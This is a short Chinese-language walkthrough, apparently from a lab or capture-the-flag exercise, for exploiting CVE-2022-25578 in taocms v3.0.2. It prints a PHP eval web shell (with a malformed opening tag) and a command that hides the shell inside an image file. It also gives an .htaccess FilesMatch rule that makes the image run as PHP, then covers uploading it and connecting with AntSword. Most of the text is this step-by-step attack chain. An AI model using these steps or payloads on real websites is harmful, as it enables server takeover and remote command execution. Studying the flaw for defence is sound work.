taocms 代码注入 （CVE-2022-25578）

名称：taocms 代码注入 （CVE-2022-25578）

描述：taoCMS是基于php+sqlite/mysql的国内最小（100Kb左右）的功能完善的CMS管理系统.体积小（仅180Kb）速度快，包含文件管理、数据采集、Memcache整合、用户管理等强大功能。

taocms v3.0.2 允许攻击者通过任意编辑.htaccess 文件来执行代码注入。

步骤1

网站搭建

点击{本站管理后台}

步骤2

查看并修改{.htaccess}

注：

htaccess文件是Apache服务器中的一个配置文件，它负责相关目录下的网页配置。通过htaccess文件，可以帮我们实现：网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。

步骤3

<?POST @eval($_POST['cmd']);?>

生成一个图片马

copy 1.jpg/b+123.php/a shell.jpg

步骤4

将图片马写入{.htaccess}进行覆盖

<FilesMatch "shell.jpg">
  SetHandler application/x-httpd-php
</FilesMatch>

步骤5

上传图片马

步骤6

访问上传的图片马

步骤7

使用蚁剑链接，得到flag